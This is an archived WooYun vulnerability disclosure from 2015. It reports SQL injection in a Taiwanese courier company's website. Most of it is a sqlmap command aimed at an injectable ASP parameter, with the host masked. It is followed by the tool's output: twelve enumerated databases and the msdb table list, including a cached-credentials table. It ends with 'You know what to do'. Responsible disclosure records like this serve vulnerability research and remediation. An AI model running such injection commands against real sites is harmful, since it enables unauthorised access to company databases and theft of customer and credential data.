WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
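2015-09-15: Details reported to the vendor; awaiting vendor handling
2015-09-17: Vendor confirmed; details disclosed to the vendor only
2015-09-27: Details disclosed to core white hats and experts in related fields
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public
SQL injection at an international courier company in Taiwan
Injection point:
sqlmap.py -u "http://**.**.**.**/news_detail.asp?n_id=129" --dbs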
available databases [12]:
[*] DPEXBOHQ
[*] DPEXEXTBILL
[*] DPEXWEB
[*] master
[*] model
[*] msdb
[*] MSDPEX95
[*] MSDPEX97
[*] MSOPS
[*] Northwind
[*] pubs
[*] tempdb

Database: msdb
[78 tables]
+-----------------------------+
| RTblClassDefs               |
| RTblClassExtension          |
| RTblDBMProps                |
| RTblDBXProps                |
| RTblDTMProps                |
| RTblDTSProps                |
| RTblDatabaseVersion         |
| RTblEQMProps                |
| RTblEnumerationDef          |
| RTblEnumerationValueDef     |
| RTblGENProps                |
| RTblIfaceDefs               |
| RTblIfaceHier               |
| RTblIfaceMem                |
| RTblMDSProps                |
| RTblNamedObj                |
| RTblOLPProps                |
| RTblParameterDef            |
| RTblPropDefs                |
| RTblProps                   |
| RTblRelColDefs              |
| RTblRelshipDefs             |
| RTblRelshipProps            |
| RTblRelships                |
| RTblSIMProps                |
| RTblScriptDefs              |
| RTblSites                   |
| RTblSumInfo                 |
| RTblTFMProps                |
| RTblTypeInfo                |
| RTblTypeLibs                |
| RTblUMLProps                |
| RTblUMXProps                |
| RTblVersionAdminInfo        |
| RTblVersions                |
| RTblWorkspaceItems          |
| backupfile                  |
| backupmediafamily           |
| backupmediaset              |
| backupset                   |
| log_shipping_primaries      |
| log_shipping_secondaries    |
| logmarkhistory              |
| mswebtasks                  |
| restorefile                 |
| restorefilegroup            |
| restorehistory              |
| sqlagent_info               |
| sysalerts                   |
| syscachedcredentials        |
| syscategories               |
| sysconstraints              |
| sysdbmaintplan_databases    |
| sysdbmaintplan_history      |
| sysdbmaintplan_jobs         |
| sysdbmaintplans             |
| sysdownloadlist             |
| sysdtscategories            |
| sysdtspackagelog            |
| sysdtspackages              |
| sysdtssteplog               |
| sysdtstasklog               |
| sysjobhistory               |
| sysjobs                     |
| sysjobs_view                |
| sysjobschedules             |
| sysjobservers               |
| sysjobsteps                 |
| sysnotifications            |
| sysoperators                |
| syssegments                 |
| systargetservergroupmembers |
| systargetservergroups       |
| systargetservers            |
| systargetservers_view       |
| systaskids                  |
| systasks                    |
| systasks_view               |
+-----------------------------+
In summary
You know what to do
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-09-17 10:02
Thank you for the notification!
None yet